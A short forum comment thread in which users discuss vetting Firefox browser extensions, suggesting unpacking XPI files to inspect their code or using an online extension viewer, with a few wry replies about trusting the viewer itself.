← Back to context

Comment by Terr_

2 days ago

> I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.

If you're feeling extra-paranoid, the XPI file can be unpacked (ZIP) and to check over the code for anything suspicious or unreasonably-complex, particularly if the browser-extension is supposed to be something simple like "move the up/down vote arrows further apart on HN". :P

While that doesn't solve the overall ecosystem issue, every little bit helps. You'll know it's time to run away if extensions become closed-source blobs.

3 comments

Terr_

Reply
insin  2 days ago

You can also, more conveniently, plug an extension's URL into this viewer:

https://robwu.nl/crxviewer/

  • Y_Y  1 day ago

    Now I have to trust that viewer doesn't hide the malicious code, nor that my browser does (presumably from an existing untrustworthy extension)

    • tetris11  16 hours ago

      It'd have to be adept at spotting it in all its forms first in order to hide it, which seems expensive for a free viewer